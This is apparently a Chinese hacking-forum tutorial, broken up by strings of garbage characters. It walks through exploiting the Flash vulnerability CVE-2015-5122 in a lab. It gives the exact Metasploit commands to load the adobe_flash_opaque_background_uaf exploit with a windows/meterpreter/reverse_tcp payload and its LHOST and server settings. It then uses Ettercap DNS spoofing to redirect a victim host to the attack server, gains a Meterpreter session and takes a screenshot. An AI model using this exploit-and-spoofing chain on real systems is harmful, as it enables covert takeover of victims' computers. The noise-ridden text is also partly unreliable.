( } X* ~9 G3 {# L. ~9 y 二、cve2015-5122漏洞实例演示虚拟机
& N7 i- x7 S5 h4 V: Q# L* a9 |! c & ^/ C+ z1 s% n4 H- \4 z
, |+ s3 \3 U: J8 w
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
% h: t+ f8 ?9 v. A% A# x2 C2 o 7 j" |' g) S% S4 E( g
" p; m( ?6 S7 Y% Y: K
search cve-2015-5122如图: ' l: ~7 X$ }4 N, W) q
( z `. k: Q, e# z; v) |
8 ~! @* ^ G E5 R; J8 ?8 }1 P
. T% ~3 z! e: X ; v/ l/ d, t! v$ P" a5 y5 G
& ? B* L# ?- C3 l 下面我们敲如下命令: % r6 l7 t6 S7 N' P+ L
& d U" ?3 E1 y4 ^' n( Q/ T3 h- ?8 |# o3 T& h+ E1 N" W
use exploit/multi/browser/adobe_flash_opaque_background_uaf
. m. R7 V0 Y2 Z( q0 J' s
7 _. `2 ?& d# ~/ b9 D9 C1 p$ U3 z" K# e/ v4 c' Q
set PAYLOAD windows/meterpreter/reverse_tcp J- z; o9 ?* s* D# H$ M0 \
+ V" f! B" `+ ]; H1 ~" G
6 s3 [; @6 P( ^ set LHOST 192.168.0.109 " C" @! ~/ W R& c$ _9 Z
. R$ R! O/ i# ` R K
; L6 N+ a% ?4 ?0 I5 v! q
set URIPATH / /*根目录*/
& Q1 f' W2 ?& p9 I# |: N2 Q ' Z" Z5 Y+ {* h3 a# J9 ?. _2 ]
. F( _8 P. d& o set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
0 ?" e5 E0 N$ x! b u+ |: g# | ) `- w2 ~8 @* ^/ [! a( \& h( {* O
$ I) N2 \4 [* @) c4 r
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
3 l( _: r2 f# ? " g/ a" b. P. |7 K5 y
% D1 T+ k" j6 h% F# N, K% l* o 然后show options如图: 8 d; Q. k. D. c3 ^- d4 S% g8 s; A
1 ]( K, [1 L6 O) g6 @
; g/ ]4 ~8 `! s+ _
& B# o$ G: N( U# w( |) u1 l- G" F* A
1 `, k- ?# n; Z+ m& @- z6 Q! a0 Q; y; m' ?! w
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: $ d6 ~8 h# Y. h1 n q. O
2 I d* q N4 m- X9 E; s
) Y& j) m% D) s# ~2 q
4 M ^# z, k8 \% W' z
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 5 K) Q/ u, J" {- h0 Q. Y: }9 [
( J- u u8 z" `9 x# r
* S- `4 e( ^5 G Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf + ?+ Q, N8 x. @6 C
9 s g3 N2 s1 t2 E4 ?# Q8 `
, _( |& _3 B9 H ( D( o- l& K0 E& J9 V5 ^
" }2 W1 {' }- T" z, v4 I
' w, N' ~: _% \* J6 B5 J 成功了,这时候我们断开ettercap,如图: 5 W5 O- n" G8 Y" }* Z8 S7 u% G- z
5 O% M4 I: w3 H, V3 {
) W) c/ `- W; c+ c6 J
& T/ M4 ]$ @! w: }) ^/ @ 4 W- S8 ^2 _1 x$ {) V6 G* b
! W; w0 X5 q! q% W
Screenshot如图: * s# }* G2 z. Q' q2 M
; m7 E; A" q2 y- ?8 t" \" T/ ?5 E! ]9 t9 J# y5 j8 `4 o
# I0 B' ]% G4 R7 ]4 l2 A* t
5 k% j; }) i- O8 B
0 L2 u. C" ^ M/ k
. S9 K$ o" |" @8 O; w% @ |